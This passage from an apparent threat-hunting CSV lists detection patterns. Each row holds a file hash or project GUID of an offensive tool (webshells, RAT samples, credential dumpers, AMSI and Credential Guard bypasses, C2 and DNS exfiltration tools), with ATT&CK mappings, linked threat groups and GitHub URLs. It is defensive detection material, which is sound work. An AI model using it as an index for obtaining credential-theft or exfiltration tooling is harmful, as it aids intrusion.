TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41930" "*e2e3e51ea97a2c74d1b98618143d69acfcdbbabd0d33607cb475757e05fc6c4b*",".{0,1000}e2e3e51ea97a2c74d1b98618143d69acfcdbbabd0d33607cb475757e05fc6c4b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - 
TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","41931" "*e2e4aa450b41227d2ba109c7f43de79ab16413cd2c249bb1c6793c0656b516e6*",".{0,1000}e2e4aa450b41227d2ba109c7f43de79ab16413cd2c249bb1c6793c0656b516e6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41932" "*e2e514386e255c21cdc78a920822cdf2fd8c9b858950d5d0e842edb2a96f3935*",".{0,1000}e2e514386e255c21cdc78a920822cdf2fd8c9b858950d5d0e842edb2a96f3935.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","41933" "*E2E5C254A2E4BDC4926B6CAD49F0F0FE3933B436DE232C85C900C41A16888F55*",".{0,1000}E2E5C254A2E4BDC4926B6CAD49F0F0FE3933B436DE232C85C900C41A16888F55.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","41934" "*E2E64E89-8ACE-4AA1-9340-8E987F5F142F*",".{0,1000}E2E64E89\-8ACE\-4AA1\-9340\-8E987F5F142F.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","#GUIDproject","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","41935" "*e2ea75cda1cbe2d628b20a93a49904f17d158866a644ff262d3c59731418c9a9*",".{0,1000}e2ea75cda1cbe2d628b20a93a49904f17d158866a644ff262d3c59731418c9a9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","41936" "*e2fc147f2ac14938a48eebc9292258af10edcc7ef057acd07ff2ae6729f1cb7a*",".{0,1000}e2fc147f2ac14938a48eebc9292258af10edcc7ef057acd07ff2ae6729f1cb7a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - 
AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","41939" "*E2FDD6CC-9886-456C-9021-EE2C47CF67B7*",".{0,1000}E2FDD6CC\-9886\-456C\-9021\-EE2C47CF67B7.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","0","#GUIDproject","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","41940" "*e2fef0ec8523ec22594297061e813d69f48f47e33d99f2f96f63a0abc053aa51*",".{0,1000}e2fef0ec8523ec22594297061e813d69f48f47e33d99f2f96f63a0abc053aa51.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","41941" "*E300339058A885475F5952FB4E9FAAA09BB6EAC26757443017B281C46B03108B*",".{0,1000}E300339058A885475F5952FB4E9FAAA09BB6EAC26757443017B281C46B03108B.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","41943" "*e301dcccae011793013ea604a8e7cbd343595fa78d09f38b2776740a55a308c8*",".{0,1000}e301dcccae011793013ea604a8e7cbd343595fa78d09f38b2776740a55a308c8.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","41944" "*e3038dfa23e4c4707e73f5b4a214fe35796b805ef213e0e84da1e20cd5643fa5*",".{0,1000}e3038dfa23e4c4707e73f5b4a214fe35796b805ef213e0e84da1e20cd5643fa5.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#filehash","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","41945" "*e30443b3f19aafa06b3edb124228f6ac35aa51737c3eb78fa007ffdce9d75bc5*",".{0,1000}e30443b3f19aafa06b3edb124228f6ac35aa51737c3eb78fa007ffdce9d75bc5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - 
T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","41946" "*e30560b23a52a32b2ad8250466c1b0a975348ab4f6240e629288bc4ad74430fb*",".{0,1000}e30560b23a52a32b2ad8250466c1b0a975348ab4f6240e629288bc4ad74430fb.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","41947" "*e30560b23a52a32b2ad8250466c1b0a975348ab4f6240e629288bc4ad74430fb*",".{0,1000}e30560b23a52a32b2ad8250466c1b0a975348ab4f6240e629288bc4ad74430fb.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","41948" "*e30a09e1311d6fdcef61667429210285a5b84b84b9bf9d6aab7d35e5715e5df9*",".{0,1000}e30a09e1311d6fdcef61667429210285a5b84b84b9bf9d6aab7d35e5715e5df9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","41950" "*e30bad2f0453e4041755190c7a33df46a175f71baa5b24e53fcce67b4d85f270*",".{0,1000}e30bad2f0453e4041755190c7a33df46a175f71baa5b24e53fcce67b4d85f270.{0,1000}","offensive_tool_keyword","webshell","collection of 
webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41951" "*E3104B33-DB3D-4C83-B393-1E05E1FF2B10*",".{0,1000}E3104B33\-DB3D\-4C83\-B393\-1E05E1FF2B10.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","41952" "*e3126e7a17ffcf6e659b3b603134067a47769e74244032cb6e23a5532913291c*",".{0,1000}e3126e7a17ffcf6e659b3b603134067a47769e74244032cb6e23a5532913291c.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","41953" "*e3130262a4adfed3a225075d6eb93c5caeeba93b1253dc1b148f8a80c5c35a03*",".{0,1000}e3130262a4adfed3a225075d6eb93c5caeeba93b1253dc1b148f8a80c5c35a03.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","41954" "*e31b89233aff02e3c31f7b507c212809cf987636abe5c8d28ccb66dec9bc976d*",".{0,1000}e31b89233aff02e3c31f7b507c212809cf987636abe5c8d28ccb66dec9bc976d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - 
T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","41956" "*e32a0a69f8d98f79823aa087f883b16e04b4993090aedc0e29ca11b571e1bc4d*",".{0,1000}e32a0a69f8d98f79823aa087f883b16e04b4993090aedc0e29ca11b571e1bc4d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41958" "*e331b3ba5acf93a468035ddc6d2591c5291574d64a509b4d511218c3bfa00f12*",".{0,1000}e331b3ba5acf93a468035ddc6d2591c5291574d64a509b4d511218c3bfa00f12.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","41960" "*e336612e451075ecb75b27bd473aa21aba4f0a98df3cef57ad303894cce4f34b*",".{0,1000}e336612e451075ecb75b27bd473aa21aba4f0a98df3cef57ad303894cce4f34b.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","41961" 
"*e347df6964e8d7ac73e12d28773f260a80109fb1049bc106ae90800381927cee*",".{0,1000}e347df6964e8d7ac73e12d28773f260a80109fb1049bc106ae90800381927cee.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","41964" "*e34e1d947623610df05776c55c67f5252dd01a0f21ed33dd48c4b0402f564173*",".{0,1000}e34e1d947623610df05776c55c67f5252dd01a0f21ed33dd48c4b0402f564173.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","41965" "*e3566acdea5e02b0fe890bae209ad90ea24daa126ba85d00c4fcf0cd71c93ad2*",".{0,1000}e3566acdea5e02b0fe890bae209ad90ea24daa126ba85d00c4fcf0cd71c93ad2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41967" "*e35cdc81954fb9701b5fd2f79300a5a6b2dd018e82aa733727a734b08ddd9715*",".{0,1000}e35cdc81954fb9701b5fd2f79300a5a6b2dd018e82aa733727a734b08ddd9715.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","41969" "*e363fb56b36aa94fa6f631c5a85401e3415fe23f5595f61d32f4828c84571882*",".{0,1000}e363fb56b36aa94fa6f631c5a85401e3415fe23f5595f61d32f4828c84571882.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","41970" "*e370fb7d05e5b2ede88b633c05b9b21aa073678c392dda6407c112afe3430a61*",".{0,1000}e370fb7d05e5b2ede88b633c05b9b21aa073678c392dda6407c112afe3430a61.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41974" "*e3731ce37c3e570254e35ac1201483592e708b43c898b3b21cca71a9f401d214*",".{0,1000}e3731ce37c3e570254e35ac1201483592e708b43c898b3b21cca71a9f401d214.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41976" "*e376445d4c432d5f3c61e4584974941028c2975b97ee1461e4f00c65eb09a0ed*",".{0,1000}e376445d4c432d5f3c61e4584974941028c2975b97ee1461e4f00c65eb09a0ed.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","#filehash","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","41978" 
"*e376d23f48816e9d9a8d74cc9f8891b6fed2cff46d2b0efe989d8272b05931f2*",".{0,1000}e376d23f48816e9d9a8d74cc9f8891b6fed2cff46d2b0efe989d8272b05931f2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41979" "*e379046040e17b60f1311e1d406a5bd9e34fd3f8b9e22cbceed612a6c3a689a9*",".{0,1000}e379046040e17b60f1311e1d406a5bd9e34fd3f8b9e22cbceed612a6c3a689a9.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","#filehash","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","41982" "*e382edfe2f7c38cb3d6abd20c75e1ac24ddc19f921aba4b92dda3e1774e45240*",".{0,1000}e382edfe2f7c38cb3d6abd20c75e1ac24ddc19f921aba4b92dda3e1774e45240.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","0","#filehash","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","41983" 
"*E383DFEA-EC22-4667-9434-3F2591A03740*",".{0,1000}E383DFEA\-EC22\-4667\-9434\-3F2591A03740.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","#GUIDproject","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","41984" "*e3991de30b4675d89877b4b22a36e71c1ac11b399e9b6826195e87354f4d6837*",".{0,1000}e3991de30b4675d89877b4b22a36e71c1ac11b399e9b6826195e87354f4d6837.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","#filehash","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","41985" "*e39b03c7268e363e670b40a4c5e65d5c04fc82557ea2abaa57e0e9b7403bdf61*",".{0,1000}e39b03c7268e363e670b40a4c5e65d5c04fc82557ea2abaa57e0e9b7403bdf61.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","41986" "*e39e2ee96b9f8bd34337c60dc9b8749f526a236664fefcf704180e818221daaa*",".{0,1000}e39e2ee96b9f8bd34337c60dc9b8749f526a236664fefcf704180e818221daaa.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","41987" "*e3a0aa509ad07aab04f9a052a9abc681d414871cd0277deef4b95ea98f1243c8*",".{0,1000}e3a0aa509ad07aab04f9a052a9abc681d414871cd0277deef4b95ea98f1243c8.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","41988" "*e3a16962b218dbe72cc43aea6c66bcf8234775ee159ec54f96758c6f4e019449*",".{0,1000}e3a16962b218dbe72cc43aea6c66bcf8234775ee159ec54f96758c6f4e019449.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","41989" "*e3a6a5d97a13040f50b38542586dbe4cf664c10b6b4264f2f7d4d1c8caf2aeec*",".{0,1000}e3a6a5d97a13040f50b38542586dbe4cf664c10b6b4264f2f7d4d1c8caf2aeec.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","41990" "*e3a6fd1ebf5912045e94cbe9cf44ec388351c89aab2054a647332e41f70f27df*",".{0,1000}e3a6fd1ebf5912045e94cbe9cf44ec388351c89aab2054a647332e41f70f27df.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41991" "*e3a86bc310bc8b100658d86bc6c8541de89bdf340651ecc848d1aeb29bd27695*",".{0,1000}e3a86bc310bc8b100658d86bc6c8541de89bdf340651ecc848d1aeb29bd27695.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41992" "*e3a9b1c8dfe7bfcebd4d908f7cc36df8d09ee579ab10738308f0536782a14fe2*",".{0,1000}e3a9b1c8dfe7bfcebd4d908f7cc36df8d09ee579ab10738308f0536782a14fe2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - 
T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41994" "*E3AEA3F6-D548-4989-9A42-80BAC9321AE0*",".{0,1000}E3AEA3F6\-D548\-4989\-9A42\-80BAC9321AE0.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","41995" "*e3b434dad7f4330a5402271014b6a450ecf998aa10d66c640798d5b1d057639a*",".{0,1000}e3b434dad7f4330a5402271014b6a450ecf998aa10d66c640798d5b1d057639a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","41996" "*e3b8202dd0e456299e6c11495357e0e540ad0c73ff73723783b968d3d28c02ac*",".{0,1000}e3b8202dd0e456299e6c11495357e0e540ad0c73ff73723783b968d3d28c02ac.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your 